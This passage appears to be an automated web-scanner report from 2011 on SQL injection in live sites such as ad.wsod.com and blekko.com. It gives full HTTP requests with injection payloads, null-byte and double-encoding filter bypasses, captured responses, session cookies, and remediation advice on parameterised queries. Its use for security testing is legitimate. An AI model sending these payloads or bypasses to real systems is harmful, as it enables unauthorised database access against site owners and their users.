29.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1377911769

29.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

29.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/991035629

29.11. https://admin.testandtarget.omniture.com/login_hal.css

29.12. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js

29.13. https://admin.testandtarget.omniture.com/skins/omniture/login.css

29.14. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css

29.15. http://api.blogburst.com/EntityImageHandler.ashx

29.16. http://api.blogburst.com/favicon.ico

29.17. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx

29.18. http://bannerfarm.ace.advertising.com/bannerfarm/84352/siteIDs.txt

29.19. http://blekko.com/autocomplete

29.20. http://blekko.com/tag/pref

29.21. http://boardreader.com/favicon.ico

29.22. http://boardreader.com/linksGraphXML.php

29.23. http://boardreader.com/moduleindex.php

29.24. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

29.25. http://cdn.demdex.net/dm/

29.26. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

29.27. http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

29.28. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx

29.29. http://hostedusa3.whoson.com/include.js

29.30. http://hostedusa3.whoson.com/invite.js

29.31. http://investing.money.msn.com/mv/MarketStatus

29.32. http://investing.money.msn.com/mv/RecentQuotes/

29.33. http://kona5.kontera.com/KonaGet.js

29.34. https://leads.demandbase.com/

29.35. http://local.msn.com/ten-day.aspx

29.36. http://local.msn.com/weather.aspx

29.37. https://maps-api-ssl.google.com/maps/api/js

29.38. http://maps.google.com/maps/api/js

29.39. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.40. http://offers.lendingtree.com/splitter/splitter.ashx

29.41. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

29.42. http://r.nexac.com/e/getdata.xgi

29.43. http://rad.msn.com/ADSAdClient31.dll

29.44. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

29.45. http://showads.pubmatic.com/AdServer/AdServerServlet

29.46. http://sociallist.org/widget.js

29.47. http://sr2.liveperson.net/hcp/html/mTag.js

29.48. http://sr2.liveperson.net/visitor/addons/deploy.asp

29.49. https://trustseal.verisign.com/getseal

29.50. http://trw.com/00_assets/02_videos/Orb_Loop.flv

29.51. http://trw.com/sites/default/themes/trw/images/footer_sep.gif

29.52. http://twitter.com/favorites/toptweets.json

29.53. http://twitter.com/oexchange.xrd

29.54. https://twitter.com/oexchange.xrd

29.55. http://urls.api.twitter.com/1/urls/count.json

29.56. https://www.astaro.com/design/en/images/icons/favicon.ico

29.57. http://www.bing.com/local/ypdefault.aspx

29.58. http://www.bing.com/search

29.59. http://www.bing.com/shopping

29.60. http://www.bing.com/shopping/pet-beds/c/5533

29.61. http://www.bing.com/shopping/photo-storage-presentation/search

29.62. http://www.bing.com/shopping/search

29.63. http://www.bing.com/shopping/televisions/c/4724

29.64. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

29.65. http://www.bing.com/shopping/womens-workout-clothing/r/146

29.66. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do

29.67. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

29.68. http://www.bing.com/travel/hotels

29.69. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx

29.70. http://www.facebook.com/extern/login_status.php

29.71. http://www.google.com/search

29.72. http://www.mensfitness.com/favicon.ico

29.73. http://www.omniture.com/listener.html

29.74. http://www.orbitz.com/App/ViewTravelWatchHome

29.75. http://www.orbitz.com/cacheable/empty.html

29.76. http://www.orbitz.com/helper/populateStateList

29.77. http://www.orbitz.com/helper/smartfill

29.78. http://www.plentyoffish.com/JpegImage.aspx

29.79. http://www.plentyoffish.com/accordian.pack.js

29.80. http://www.plentyoffish.com/member11499165.htm

29.81. http://www.plentyoffish.com/member1242943.htm

29.82. http://www.plentyoffish.com/member16373418.htm

29.83. http://www.plentyoffish.com/member19992238.htm

29.84. http://www.plentyoffish.com/member22529971.htm

29.85. http://www.plentyoffish.com/member22970699.htm

29.86. http://www.plentyoffish.com/member23010679.htm

29.87. http://www.plentyoffish.com/member23031204.htm

29.88. http://www.plentyoffish.com/member23817184.htm

29.89. http://www.plentyoffish.com/member24663198.htm

29.90. http://www.plentyoffish.com/member24778333.htm

29.91. http://www.plentyoffish.com/member25294614.htm

29.92. http://www.plentyoffish.com/member25300504.htm

29.93. http://www.plentyoffish.com/member25401489.htm

29.94. http://www.plentyoffish.com/member25429166.htm

29.95. http://www.plentyoffish.com/needs_test.aspx

29.96. http://www.plentyoffish.com/safety.aspx

29.97. http://www.plentyoffish.com/terms.aspx

29.98. http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=script&pos=middle&

29.99. http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=script&pos=middle&

29.100. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&

29.101. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

29.102. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

29.103. http://www.stocktrader.org.uk/remote2/ST1-1.php

29.104. http://www.techmynd.com/feed/atom/

29.105. http://www.threatexpert.com/settings.xml

29.106. http://www.w3.org/TR/html4/strict.dtd

29.107. http://www.websitetoolbox.com/cgi/stat/js.cgi

30. Content type is not specified

30.1. http://ad.reduxmedia.com/st

30.2. http://ad.yieldmanager.com/st

30.3. https://login.hitbox.com/dhtml.js,utility.js,cookie.js,helpers.js,dom_object_extensions.js,dom_selectbox.js,dom_autosuggest.js

30.4. https://login.hitbox.com/images/001982.banner_viralvideo_v1.hbx923x320.jpg

30.5. https://login.hitbox.com/images/bg_button.gif

30.6. https://login.hitbox.com/images/bg_footer_dash.gif

30.7. https://login.hitbox.com/images/bg_masthead.gif

30.8. https://login.hitbox.com/images/footer_graphic.gif

30.9. https://login.hitbox.com/images/icon_close_small.gif

30.10. https://login.hitbox.com/images/img_customer_service.gif

30.11. https://login.hitbox.com/images/logo_hbx_analytics.gif

30.12. https://login.hitbox.com/js/hbx.js

30.13. https://login.hitbox.com/login

30.14. https://login.hitbox.com/px.gif

30.15. https://login.hitbox.com/ss_style.css

30.16. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard

30.17. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

31. SSL certificate

31.1. https://ads.pof.com/

31.2. https://www.astaro.com/



1. SQL injection  next
There are 20 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The PG parameter appears to be vulnerable to SQL injection attacks. The payloads 66872473'%20or%201%3d1--%20 and 66872473'%20or%201%3d2--%20 were each submitted in the PG parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d1--%20&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:21:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:21:37 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:21:37 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 856

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d1--%20&ASI
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/7_texture_120x30-120x30NL.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }
   
   wsod_image();
   

Request 2

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d2--%20&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:21:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:21:38 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38885:1296915698:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:21:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 845

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d2--%20&ASI
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/120x30 Static.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }
   
   wsod_image();
   

1.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [i_34 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The i_34 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the i_34 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2'%20and%201%3d1--%20; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:22:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:22:57 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:38885:1296915777:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:22:57 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 829

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a4
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/7_texture_120x30-120x30NL.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }
   
   wsod_image();
   

Request 2

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2'%20and%201%3d2--%20; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:22:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:22:58 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38885:1296915778:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:22:58 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 818

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a4
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/120x30 Static.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }
   
   wsod_image();
   

1.3. http://blekko.com/ws/+/adsense=9396229490951644 [suggestedSlashtagsList cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/adsense=9396229490951644

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/adsense=9396229490951644 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:38:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:38:35 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 69227
X-Blekko-QF: hq
X-Blekko-PT: 043e4df497bc60c2f9d74ccf2865876e

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
form CSRF attacks against FTP services, in this case Sun Solaris 10 ftpd. An attacker could embed a payload such as the following to execute commands on ftpd. The NetBSD team addressed this issue by failing on large commands.</p>
...[SNIP]...

Request 2

GET /ws/+/adsense=9396229490951644 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00''; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:35 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.4. http://blekko.com/ws/+/ip=207.97.227.239 [sessionid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/ip=207.97.227.239

Issue detail

The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sessionid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/ip=207.97.227.239 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%2527; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:38:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:38:49 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 67781
X-Blekko-QF: hq
X-Blekko-PT: c6c42f446173c6636976da330a49adfe

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<p class="desc" id="snippet9">Generating SSH keys. Attempting to redirect to the guide for your OS. If the redirect fails, pick your OS. How to install git. How to generate SSH keys and add them to GitHub.</p>
...[SNIP]...

Request 2

GET /ws/+/ip=207.97.227.239 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%2527%2527; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:49 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.5. http://blekko.com/ws/+/press-videos [fbl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The fbl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fbl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fbl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2%2527;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:27 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2%2527%2527;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:27 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:27 GMT
Content-Length: 24116
X-Blekko-PT: 9e2a197eec3851ae4e785b4d3d881d57

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.6. http://blekko.com/ws/+/press-videos [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/press-videos?1%00'=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:31 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos?1%00''=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:31 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:31 GMT
Content-Length: 24146
X-Blekko-PT: 311769e7f41b71315993b41ac3f8ce2d

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.7. http://blekko.com/ws/+/press-videos [sessionid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

